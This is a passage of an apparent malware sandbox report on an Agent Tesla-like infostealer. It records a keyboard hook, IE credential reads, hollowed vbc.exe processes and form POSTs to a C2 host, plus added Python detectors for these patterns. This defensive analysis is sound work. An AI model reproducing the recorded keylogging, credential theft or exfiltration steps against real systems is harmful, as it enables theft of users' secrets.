Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc6.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\dhcpcsvc.DLL, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\credssp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\CFGMGR32.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\DNSAPI.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\rasadhlp.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\System32\fwpuclnt.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\system32\shfolder.dll, size = 2048 True 3
Fn
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe, file_name_orig = C:\Windows\syswow64\psapi.dll, size = 2048 True 3
Fn
Get Address c:\windows\syswow64\advapi32.dll function = DuplicateTokenEx, address_out = 0x74d4ca24 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ResetSecurity, address_out = 0x6a311944 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SetSecurity, address_out = 0x6a311986 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServices, address_out = 0x6a3119cc True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BlessIWbemServicesObject, address_out = 0x6a311a1e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyHandle, address_out = 0x6a311a70 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = WritePropertyValue, address_out = 0x6a311a89 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Clone, address_out = 0x6a311aa2 True 2
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = VerifyClientKey, address_out = 0x6a312270 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetQualifierSet, address_out = 0x6a311d73 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Get, address_out = 0x6a311b96 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Put, address_out = 0x6a311b7a True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Delete, address_out = 0x6a311bb5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetNames, address_out = 0x6a311bc8 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginEnumeration, address_out = 0x6a311be4 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = Next, address_out = 0x6a311bf7 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndEnumeration, address_out = 0x6a311c16 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyQualifierSet, address_out = 0x6a311c26 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetObjectText, address_out = 0x6a311c3c True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnDerivedClass, address_out = 0x6a311c52 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = SpawnInstance, address_out = 0x6a311c68 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CompareTo, address_out = 0x6a311c7e True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetPropertyOrigin, address_out = 0x6a311c94 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = InheritsFrom, address_out = 0x6a311caa True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethod, address_out = 0x6a311cbd True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutMethod, address_out = 0x6a311cd9 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = DeleteMethod, address_out = 0x6a311cf5 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = BeginMethodEnumeration, address_out = 0x6a311d08 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = NextMethod, address_out = 0x6a311d1b True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = EndMethodEnumeration, address_out = 0x6a311d37 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodQualifierSet, address_out = 0x6a311d47 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetMethodOrigin, address_out = 0x6a311d5d True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Get, address_out = 0x6a311d86 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Put, address_out = 0x6a311da2 True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Delete, address_out = 0x6a311dbb True 1
Fn
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_GetNames, address_out = 0x6a311dce True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_Next, address_out = 0x6a311df7 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetCurrentApartmentType, address_out = 0x6a311d73 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = GetDemultiplexedStub, address_out = 0x6a3118fd True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateInstanceEnumWmi, address_out = 0x6a311580 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CreateClassEnumWmi, address_out = 0x6a3115f6 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecQueryWmi, address_out = 0x6a31169e True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ExecNotificationQueryWmi, address_out = 0x6a311717 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutInstanceWmi, address_out = 0x6a311790 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = PutClassWmi, address_out = 0x6a311810 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = CloneEnumWbemClassObject, address_out = 0x6a311890 True 1
Get Address c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll function = ConnectServerWmi, address_out = 0x6a3124b7 True 1
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
User (2)
Operation Additional Information Success Count
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 1
Window (6)
Operation Window Name Additional Information Success Count
Create - class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 True 1
Create - class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 True 1
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Set Attribute - class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = -4, new_long = 34804490 True 1
Set Attribute - class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 1997940189 True 1
Set Attribute - class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = -4, new_long = 34805690 True 1
Note: index = -4 is GWL_WNDPROC, and new_long = 1997940189 is 0x771625DD, the DefWindowProcW address resolved in the Module table above; these are the message-only WinForms windows the .NET runtime creates and restores, not windows shown to the user.
Keyboard (82)
Operation Additional Information Success Count
Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 2
Read result_out = 1 True 2
Read virtual_key_code = VK_SHIFT, result_out = 0 True 24
Read virtual_key_code = VK_CONTROL, result_out = 0 True 24
Read virtual_key_code = VK_MENU, result_out = 0 True 9
Read virtual_key_code = VK_CAPITAL, result_out = 0 True 6
Read virtual_key_code = VK_MENU, result_out = -127 True 9
Read virtual_key_code = VK_MENU, result_out = 1 True 6
System (64)
Operation Additional Information Success Count
Get foreground window - True 17
Get window text window_text = 2550884 True 10
Get window text window_text = 2550884 False 5
Get Computer Name result_out = XDUWTFONO True 2
Get Time type = System Time, time = 2019-07-22 00:25:10 (UTC) through 2019-07-22 00:25:28 (UTC), one call per second True 19 (19 rows of count 1)
Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x213162a True 1
Get Info type = Operating System True 6
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Get Network Adapter Info - False 1
Get Network Adapter Info - True 1
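The Keyboard and System tables above show the polling keylogger pattern in full: a WH_KEYBOARD_LL hook is registered, the state of VK_SHIFT, VK_CONTROL, VK_MENU and VK_CAPITAL is read dozens of times, and the foreground window and its title are fetched alongside the key reads so that captured text can be attributed to an application. The Python below is an added example and not part of the VMRay report: it parses behaviour rows in the shape this report prints them and scores a process on that combination of hook, key polling and focus tracking. The sample rows are copied from the tables above; the parser assumes the Operation / Additional Information / Success / Count layout and that detail values contain no commas.

```python
import re
from collections import defaultdict

# Sample rows copied from the Keyboard and System tables of this report, in the
# "<Operation> <key = value, ...|-> <True|False> <Count>" shape VMRay prints.
SAMPLE_ROWS = [
    "Get Info type = KB_LOCALE_ID, os_tid = 1120, result_out = 67699721 True 2",
    "Read virtual_key_code = VK_SHIFT, result_out = 0 True 24",
    "Read virtual_key_code = VK_CONTROL, result_out = 0 True 24",
    "Read virtual_key_code = VK_MENU, result_out = -127 True 9",
    "Get foreground window - True 17",
    "Get window text window_text = 2550884 True 10",
    "Get window text window_text = 2550884 False 5",
    "Register Hook type = WH_KEYBOARD_LL, hookproc_address = 0x213162a True 1",
    "Get Computer Name result_out = XDUWTFONO True 2",
]

# Success flag and count always close the row; everything before them is operation + details.
ROW_TAIL = re.compile(r"^(?P<body>.+?)\s+(?P<success>True|False)\s+(?P<count>\d+)$")


def parse_row(row):
    """Split one behaviour row into operation, key/value details, success flag and count.

    Assumption: detail values never contain commas (true for the rows used here)."""
    m = ROW_TAIL.match(row.strip())
    if not m:
        raise ValueError(f"unparseable row: {row!r}")
    body = m.group("body")
    if "=" in body:
        # The word before the first '=' is the first detail key; the operation precedes it.
        head, _, rest = body.partition("=")
        words = head.split()
        op, details = " ".join(words[:-1]), f"{words[-1]} ={rest}"
    else:
        # No key/value details: the column holds a bare '-'.
        words = body.split()
        op, details = " ".join(words[:-1]), words[-1]
    info = {}
    if details != "-":
        for pair in details.split(","):
            key, _, value = pair.partition("=")
            info[key.strip()] = value.strip()
    return {"op": op, "info": info, "success": m.group("success") == "True",
            "count": int(m.group("count"))}


def assess_keylogger(rows):
    """Return (verdict, evidence) for the hook + key polling + focus tracking combination."""
    evidence = defaultdict(int)
    for r in (parse_row(x) for x in rows):
        if r["op"] == "Register Hook" and r["info"].get("type") in ("WH_KEYBOARD_LL", "WH_KEYBOARD"):
            evidence["keyboard_hook"] += r["count"]
        elif r["op"] == "Read" and "virtual_key_code" in r["info"]:
            evidence["key_state_polls"] += r["count"]
        elif r["op"] in ("Get foreground window", "Get window text"):
            evidence["focus_tracking"] += r["count"]  # failed calls count too: the attempt is the signal
    # A hook alone is what IMEs and accessibility tools do; hook plus polling or
    # window attribution is the keylogger shape.
    verdict = evidence["keyboard_hook"] > 0 and (
        evidence["key_state_polls"] > 0 or evidence["focus_tracking"] > 0)
    return verdict, dict(evidence)


if __name__ == "__main__":
    print(assess_keylogger(SAMPLE_ROWS))
```

On the rows above the verdict is positive with 1 hook registration, 57 key-state polls and 32 foreground-window or window-title calls; the same scoring can be run over the full exported behaviour table of any process in the report.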
Mutex (12)
Operation Additional Information Success Count
Create mutex_name = Global\.net clr networking True 10
Create mutex_name = Global\.net clr networking False 1
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Environment (26)
Operation Additional Information Success Count
Get Environment String name = appdata, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 3
Get Environment String name = temp, result_out = C:\Users\5P5NRG~1\AppData\Local\Temp True 18
Get Environment String name = APPDATA, result_out = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming True 3
Get Environment String name = windir, result_out = C:\Windows True 2
Network Behavior
DNS (3)
Operation Additional Information Success Count
Resolve Name host = www.agenttesla.com, address_out = 46.166.182.114 True 1
Resolve Name host = survey-smiles.com, address_out = 127.0.0.1 True 2
TCP Sessions (4)
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 127.0.0.1
TCP Sessions #1 to #4 (all four identical)
Information Value
Remote Address 127.0.0.1
Remote Port 80
Local Address 192.168.0.53
Local Port -
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 127.0.0.1, remote_port = 80 False 1
Close type = SOCK_STREAM True 1
HTTP Sessions (4)
Information Value
Total Data Sent 1.05 KB
Total Data Received 1.43 KB
Contacted Host Count 1
Contacted Hosts 46.166.182.114
Common to all four sessions
Information Value
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)
Server Name www.agenttesla.com
Server Port 80
Username -
Password -
Data Received 367 bytes
Operation Additional Information Success Count
Open Session user_agent = Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) True 1
Open Connection protocol = http, server_name = www.agenttesla.com, server_port = 80 True 1
Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = /post.php True 1
Send HTTP Request headers = User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729), Content-Type: application/x-www-form-urlencoded, Host: www.agenttesla.com, Content-Length: (per session, below), Expect: 100-continue, Connection: Keep-Alive (session #1 only), url = www.agenttesla.com/post.php True 1
Read Response size = 4096, size_out = 367 True 1
Close Session - True (per session, below)
Per-session differences
Session Data Sent Content-Length header Connection header Close Session count
#1 287 bytes 181 Keep-Alive 4
#2 263 bytes 227 (none) 2
#3 263 bytes 225 (none) 2
#4 263 bytes 284 (none) 2
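The four HTTP sessions differ only in body length; everything else is fixed: a POST to /post.php on www.agenttesla.com, a form-urlencoded body, an Expect: 100-continue header (the default behaviour of .NET's HttpWebRequest, and something browsers do not send), and a User-Agent whose parts do not belong together, since Gecko rv:1.9.2.x is the Firefox 3.6 engine while the product token says Firefox/4.0 and the trailing ".NET CLR" token is an Internet Explorer convention. That fixed shape makes the request a usable network signature. The Python below is an added example and not part of the report: it parses a raw HTTP request and returns the indicators it matches. The request text is reconstructed from Session #1's recorded headers; the 181-byte body was not captured on this page, so a filler body of the declared length stands in for it.

```python
import re

# Constructed request reproducing the request line and headers VMRay logged for
# HTTP Session #1. The 181-byte form body was not captured on the page, so a
# filler body of the declared length stands in for it.
SAMPLE_REQUEST = (
    "POST /post.php HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) "
    "Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www.agenttesla.com\r\n"
    "Content-Length: 181\r\n"
    "Expect: 100-continue\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
    + "a=" + "x" * 179
)

# Gecko rv:1.9.2.x is the Firefox 3.6 engine; real Firefox 4.0 reports rv:2.0. A UA that
# carries both is hard-coded by the client, not produced by a browser.
UA_MISMATCH = re.compile(r"rv:1\.9\.2\.\d+\).*Firefox/4\.0")


def parse_request(raw):
    """Minimal HTTP/1.1 request parser: request line, lower-cased header map, body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def score_request(raw):
    """Return the parsed request and the list of beacon indicators it matches."""
    req = parse_request(raw)
    h = req["headers"]
    hits = []
    if UA_MISMATCH.search(h.get("user-agent", "")):
        hits.append("ua_engine_version_mismatch")
    if req["method"] == "POST" and req["target"] == "/post.php":
        hits.append("post_php_endpoint")
    # Expect: 100-continue on a form POST is the .NET HttpWebRequest default; browsers do not send it.
    if h.get("content-type", "").startswith("application/x-www-form-urlencoded") and "expect" in h:
        hits.append("dotnet_form_post_with_expect")
    # Sanity check for truncated captures: body length must match the declared Content-Length.
    if int(h.get("content-length", "0")) != len(req["body"].encode()):
        hits.append("content_length_mismatch")
    return req, hits


if __name__ == "__main__":
    print(score_request(SAMPLE_REQUEST)[1])
```

Any one of the three positive indicators is weak on its own; a POST that carries all three to a host resolved by the sample is what should raise the alert, and the Content-Length check keeps a half-captured request from being scored as if it were complete.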
Process #4: vbc.exe
Information Value
ID #4
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
Command Line C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:55, Reason: Child Process
Unmonitor End Time: 00:00:57, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
Information Value
PID 0xbf8
Parent PID 0xb18 (c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xBFC, 0x6BC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA
buffer 0x00400000 0x00422FFF Marked Executable - 32-bit 0x0040F046, 0x00401000, ... False False
Injection Information
Injection Type Source Process Source Os Thread ID Information Success Count
Modify Control Flow #2: c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe 0xb1c os_tid = 0xbfc True 1
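Process #4 is vbc.exe, the VB.NET compiler, started by msbuild.exe with "-f <Temp>\IEPass.txt" and, per the Injection Information table, given its code by msbuild.exe through a control-flow modification; its only memory dump is a buffer marked executable at the image base 0x00400000, which is the footprint of a hollowed process. A genuine compiler run carries source files, project files or a response file; a compiler that has no such input, writes a .txt into %TEMP% and is injected by its parent is serving as a trusted-looking host for someone else's code (Process #5 below is started the same way with "/stext", the save-as-text switch of the NirSoft password recovery utilities, which matches the mail-store reads it goes on to make). The Python below is an added example and not part of the report or of any product: it evaluates constructed process-creation events shaped like Sysmon Event ID 1 records, carrying the PIDs, parents and command lines from this page, and flags compiler launches that do not look like a build. The allowlist of processes expected to start MSBuild is an assumption to be tuned per environment.

```python
import ntpath
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 records,
# using the PIDs, parents and command lines recorded for processes #1, #2, #4 and #5.
EVENTS = [
    {"pid": 0xa60, "ppid": 0x45c,
     "image": r"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe",
     "cmdline": r'"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\gmmqacgpk.exe"'},
    {"pid": 0xb18, "ppid": 0xa60,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"'},
    {"pid": 0xbf8, "ppid": 0xb18,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe -f C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt"},
    {"pid": 0x594, "ppid": 0xb18,
     "image": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext C:\Users\5P5NRG~1\AppData\Local\Temp\Mails.txt"},
]

DOTNET_COMPILERS = {"vbc.exe", "csc.exe"}
BUILD_HOSTS = {"msbuild.exe"}
# What a real compiler invocation carries: sources, project files, response files or compiler switches.
COMPILER_INPUT_HINTS = (".vb", ".cs", ".vbproj", ".csproj", "@", "/noconfig", "-noconfig", "/out:", "-out:")
# Save-format switches of the NirSoft recovery utilities; none of them is a vbc/csc option.
NIRSOFT_SAVE_SWITCHES = {"/stext", "/shtml", "/sxml", "/scomma"}
# Assumption: processes from which an MSBuild launch is expected. Tune per estate.
EXPECTED_MSBUILD_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "cmd.exe", "powershell.exe"}


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def find_hollowed_compilers(events):
    """Return [(pid, reasons)] for compiler processes whose launch does not look like a build."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if ntpath.basename(e["image"]).lower() not in DOTNET_COMPILERS:
            continue
        args = [a.lower() for a in tokenize(e["cmdline"])[1:]]
        reasons = []
        if not any(a.endswith(h) or a.startswith(h) for a in args for h in COMPILER_INPUT_HINTS):
            reasons.append("no_compiler_input")
        if NIRSOFT_SAVE_SWITCHES & set(args):
            reasons.append("nirsoft_save_switch")
        if any("\\temp\\" in a and a.endswith(".txt") for a in args):
            reasons.append("writes_txt_to_temp")
        # MSBuild spawning vbc.exe is normal; MSBuild itself being spawned by an unknown
        # desktop binary is not, so walk one more level up the tree.
        parent = by_pid.get(e["ppid"])
        grand = by_pid.get(parent["ppid"]) if parent else None
        if parent and grand and ntpath.basename(parent["image"]).lower() in BUILD_HOSTS:
            launcher = ntpath.basename(grand["image"]).lower()
            if launcher not in EXPECTED_MSBUILD_PARENTS:
                reasons.append("msbuild_launched_from_" + launcher)
        if reasons:
            findings.append((hex(e["pid"]), reasons))
    return findings


if __name__ == "__main__":
    for pid, reasons in find_hollowed_compilers(EVENTS):
        print(pid, ", ".join(reasons))
```

The command-line checks fire on both vbc.exe instances; the grandparent check adds that the MSBuild which spawned them was itself started by the analysis target from the user's Desktop, which is the chain a build server or IDE never produces.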
Dropped Files
Filename File Size Hash Values YARA Match
C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt 389 bytes MD5: b8ea3a8f80e92d59650fbf1e4bc84bfd
SHA1: cbeed9d5866317cabf68ab8a356094fb06d761c0
SHA256: fdaeb29c5dc8d7be90d16833ec1afadf778cefde08f5ff22b0d420fe274da0f0
SSDeep: 3:r133PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPovL1E0AN0yOAVKXRy133a:evL1NyJvVNSvrJWgOWUVFDZNJ48WUfa
False
Host Behavior
File (11)
Operation Filename Additional Information Success Count
Create C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Get Info STD_INPUT_HANDLE type = file_type True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info STD_ERROR_HANDLE type = file_type True 1
Get Info C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt type = file_type True 1
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 3
Open STD_ERROR_HANDLE - True 1
Write C:\Users\5P5NRG~1\AppData\Local\Temp\IEPass.txt size = 389 True 1
Registry (4)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer - True 1
Open Key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 - False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer value_name = svcVersion, data = 72, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer value_name = Version, data = 8.0.7601.17514, type = REG_SZ True 1
Module (32)
Operation Module Additional Information Success Count
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 1
Get Handle mscoree.dll - False 1
Get Filename - process_name = c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe, file_name_orig = C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
User (1)
Operation Additional Information Success Count
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
System (3)
Operation Additional Information Success Count
Get Time type = System Time, time = 2019-07-22 00:25:12 (UTC) True 1
Get Time type = Performance Ctr, time = 17669373483 True 1
Get Info type = Operating System True 1
Environment (1)
Operation Additional Information Success Count
Get Environment String - True 1
Process #5: vbc.exe
Information Value
ID #5
File Name c:\windows\microsoft.net\framework\v2.0.50727\vbc.exe
